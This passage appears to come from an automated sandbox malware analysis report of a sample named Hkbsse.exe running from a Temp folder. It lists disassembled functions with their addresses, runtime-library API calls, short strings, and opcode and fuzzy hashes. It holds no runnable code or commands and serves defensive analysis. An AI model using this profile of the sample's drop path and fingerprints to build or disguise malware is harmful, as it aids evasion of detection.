                    • Instruction Fuzzy Hash: 1CE11BB1E14144ABEB08EF78CD4679E7B719F41308F50815EF411A73C6DB7DAA40879A
                    Function 00417220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0041744C
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @.@$@|A
                    • API String ID: 3366076730-1638491229
                    • Opcode ID: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction ID: 5e1297a57d6b7b639a8e02b3d6bde4c068ab49fd92cbbf4b728f3a3119506081
                    • Opcode Fuzzy Hash: 9198d7d0723313f094a4fbefec6dcaa9f5ff6ff65217a6e00dcf0e57fd239118
                    • Instruction Fuzzy Hash: 23A136B0A01619CFDB21CF69C98479EBBF0FF48714F18819AE819AB351E7799D41CB84
                    Function 004390BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 004390FD, 0043913A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: e36cff2137ef11141afc6ba0048b09c1a3638fd79f1bf7c1abf2875572eb59fc
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 4941D271A00215ABEF15DF9ADC859AFBBB8EB8D300F14106BE400A7351E7F88E41CB59
                    Function 00417A50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417B48
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417B51
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 49822466f79195f0923cdfa79eb360033f78237c3dc66e2f1ea9358432c9a1c7
                    • Instruction ID: 190a37b34fbfeecb8fffc7a3455fb99a6090ca9c34ce7be73932cc516f32dd04
                    • Opcode Fuzzy Hash: 49822466f79195f0923cdfa79eb360033f78237c3dc66e2f1ea9358432c9a1c7
                    • Instruction Fuzzy Hash: 0631F3B1A047009BD720DF68D845A9BB7F8EF14354F100A2FE946C3241E779FA94C3A9
                    Function 044B9321 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                    Download Yara Rule
                    Strings
                    • C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe, xrefs: 044B9364, 044B93A1
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                    • API String ID: 0-2480956006
                    • Opcode ID: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction ID: 1e44a30b8b41ac28396a2e2afe1b728d495e6675528631cdc0ed7e26163a5760
                    • Opcode Fuzzy Hash: a17d57e60d168b2e2e9f8c893ba8581ed93e8945fc96e4ae5ef2c64ef190e72b
                    • Instruction Fuzzy Hash: 7041A9B1A04614ABDF25DF9A98819DFBBB8EF88310F14406BE541D7351EBB0AA40C7F1
                    Function 044BE7BA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044BE563: GetOEMCP.KERNEL32(00000000,044BE7D5,?,?,044B78F5,044B78F5,?), ref: 044BE58E
                    • _free.LIBCMT ref: 044BE832
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction ID: a619cf8e048a6a5cc2613f6b9b6b599ad8aafd4085c34e5d34a7cb6dcc28c94f
                    • Opcode Fuzzy Hash: 63543627e392427e2bb9f2d8bdd097651d763b6fbf4343d7bf33c5043982c81c
                    • Instruction Fuzzy Hash: 63319271900A49AFDF11DF59D840ADF77F4EF84314F21406AE8909B2A1EB71E950CBA0
                    Function 00403930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00403962
                    • __Mtx_init_in_situ.LIBCPMT ref: 004039A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pB@
                    • API String ID: 3366076730-522444117
                    • Opcode ID: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction ID: 85cc1f21d270febbee68db5d29f907cdb29bffcc18a0c6cdd29de26c28620044
                    • Opcode Fuzzy Hash: 74691cddd157f9733b136221944eda0284ddcc00da53afa76240b6fc065f8951
                    • Instruction Fuzzy Hash: C04127B46017058FD720CF29C988B5ABBF4FF44315F10861EE86A8B381E7B8A905CF80
                    Function 0041B6E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0041B76E
                    • RaiseException.KERNEL32(?,?,?,?), ref: 0041B793
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                      • Part of subcall function 00438C8F: IsProcessorFeaturePresent.KERNEL32(00000017,0043A7CD,?,?,00436A5A,?,?,?,?,0043768E,?), ref: 00438CAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                    • String ID: csm
                    • API String ID: 1924019822-1018135373
                    • Opcode ID: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction ID: 279872545446a478c70440809aaa54d3911d66500b0e0947e58eeb54dd8337e2
                    • Opcode Fuzzy Hash: c95906c105d3fe5d98dead7adff23072b26268c9b0da60fee90a03e3cf153ed8
                    • Instruction Fuzzy Hash: 7521B635D002189BCF24EFA5D945AEEB3B5EF84715F58401EE419AB290CB38AD85CBC5
                    Function 0043694B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00436ADC: _free.LIBCMT ref: 00436AEA
                      • Part of subcall function 0043B139: MultiByteToWideChar.KERNEL32(0043E7FD,00000100,E8458D00,00000000,00000000,00000020,?,0043F2AF,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0043B1A9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00436E4A,00000000,?,00000000,?), ref: 004369AF
                    • __dosmaperr.LIBCMT ref: 004369B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                    • String ID: JnC
                    • API String ID: 4030486722-2531755783
                    • Opcode ID: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction ID: a10604e378203b479d6c6f5be248016944f26615d1a374979f6fa953727c9187
                    • Opcode Fuzzy Hash: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction Fuzzy Hash: 75210BB1500612BBCB206F278C01B1B77A9EF49370F12D21FF5699B290D778E8108BD9
                    Function 00431812 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431872
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 3390424672-2046700901
                    • Opcode ID: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
                    • Instruction ID: 7964dc9a277d96143858123c881e5cd0313aeba4e8efcfbf37adde4059d6b578
                    • Opcode Fuzzy Hash: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
                    • Instruction Fuzzy Hash: EE110636A00214ABCB19BF19C48596E7765AF4C365F14406BEC02A73A2DB7CDD05CBDD
                    Function 0041D4F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction ID: c76681e0b964bcace0b93bbe14680470d23c52cf74b0c73484cba7b613844c7a
                    • Opcode Fuzzy Hash: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction Fuzzy Hash: EE01C875C0030D77CB14AEA5EC0598A77AC9E04319F10862BBA14A6591FB78EA98C699
                    Function 0041D101 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D32A
                    • ___raise_securityfailure.LIBCMT ref: 0041D411
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: @WF
                    • API String ID: 3761405300-3852368868
                    • Opcode ID: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction ID: 75ee518bf79167b8f649b50e41bdf5ed7c56c8c6d5508b330e436f80bcac97d4
                    • Opcode Fuzzy Hash: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction Fuzzy Hash: D321DFB4510B00EAD720EF55EA856543BE4FB58314F50513AEA088BAB1F3F458A5CF8E
                    Function 004197D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock
                    • String ID: P#@$P#@
                    • API String ID: 1418687624-3974838576
                    • Opcode ID: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction ID: d675d88b1282bf066b476e3553b00fe0255c5d2f2a02dd3f05bed3fb85d18cc6
                    • Opcode Fuzzy Hash: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction Fuzzy Hash: 1E0128356003086BC714FF95D801E9B7B9D9F04719B00457FFA05B7642EFB8AA4487AD
                    Function 0043A7CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction ID: d85ed182e3a527026958e8772241ee3510a0413970d01727080480170c1ae8b7
                    • Opcode Fuzzy Hash: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction Fuzzy Hash: 00015231985A2176E52932365D46B6B12489B1D768F14222BFBB0A62E2FB5D8C2301DF
                    Function 00433C12 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    • Opcode ID: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction ID: ccb3f3f5f7c9ee04892ce8e489ef89d1f636ac3599413e13066f302f7a6b8dbe
                    • Opcode Fuzzy Hash: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction Fuzzy Hash: 1E01A236900208AFD7019F5DD884BAEBBB8FF48701F15915AE904AB3A1D770EE01CF90
                    Function 00419B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00419B6B
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00419B74
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction ID: e068e03794c4fb8f333e278d6eb3df2bafc1dd7495d534287246863c21af4ae8
                    • Opcode Fuzzy Hash: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction Fuzzy Hash: 05F04FB29047009BCA24DB61E459BDB73E8BF44304F04491EE69687A41D778F988C795
                    Function 00402440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction ID: 63b28b545846f2e16aeef958533034f84efa6074d6cfadea166291daee7e4e7d
                    • Opcode Fuzzy Hash: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction Fuzzy Hash: 6EF0A0B680020C67C714EEE5D801986B7ACDE19305F108A2BFB50A7501F7B4BA488799
                    Function 00403400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040343E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy$ExceptionRaise
                    • String ID: P#@$P#@
                    • API String ID: 2103344913-3974838576
                    • Opcode ID: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction ID: 59601a4cc39f227afb39c20c06a9e1ce7c679964eee42f0a4464548f58adb70b
                    • Opcode Fuzzy Hash: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction Fuzzy Hash: A2F0EC76D1020C67C714EFD9DC01D87B7ACDE04305B10892BFA10B7502FBB4B54487A9
                    Function 00417C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417C66
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417C6F
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction ID: abed85cd935592136217e6f665b32487889cb1eb46ec7d36a7aebd99e62de6e6
                    • Opcode Fuzzy Hash: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction Fuzzy Hash: 9CF0E970A4130957C7209B64CC45A86B7D89F01319B14862FF95887291E779E8848BD8
                    Function 0043E2FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • GetOEMCP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E327
                    • GetACP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E33E
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: nC
                    • API String ID: 0-511710893
                    • Opcode ID: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction ID: 21ada401c65e344d19c9832113dec9a351789fdaec7677b80bc96e6f92cc92e3
                    • Opcode Fuzzy Hash: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction Fuzzy Hash: 42F0C230509200CBDB10EB65E85876D37B0AB04339F244355E835972E2D3B49845CB4A
                    Function 00402520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction ID: eb727e4c6e3963252b4e60716a57e365d02bcbec5f304e335dc0a3bb04f943e9
                    • Opcode Fuzzy Hash: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction Fuzzy Hash: A1F08271D1020CABC714DF68D84198EBBF4AF59304F1082AFE844A7201EBB56A98CB99
                    Function 0449D488 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 0449D493
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 0449D4D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: WF
                    • API String ID: 3168844106-2907287748
                    • Opcode ID: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction ID: 83d176eadb598fa6c55f8d42a9a601c1d5a465e9c5e9655c6ddb582a6d6fb352
                    • Opcode Fuzzy Hash: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction Fuzzy Hash: B5F0E234A00A00DFCF209F25DD44A2A7BE8EB86736F10022EEA55472D0E7347C42DA16
                    Function 0042BA3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042BA5E
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042BA71
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 548886458-2046700901
                    • Opcode ID: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction ID: 293f1ce4af30ee7a2289b2cafc5ba0a963c10326eaee9af88c8a7d0fff09a4de
                    • Opcode Fuzzy Hash: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction Fuzzy Hash: C9E0613EB4021467CB04B765E809C5DB77D9EC4714B10002BFA11A3362DF78DE44C5D8
                    Function 00402E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E50
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E59
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction ID: 46641368e6e60d11f9b06d4282c7db89a0e812e8be57c8d216f63cbc4c5833f8
                    • Opcode Fuzzy Hash: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction Fuzzy Hash: 0FE020B284130427C311AA909C0AEC77BCC8F11305F00482FFD5452242E7F9958447D8
                    Function 004235DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042360C
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pScheduler$version
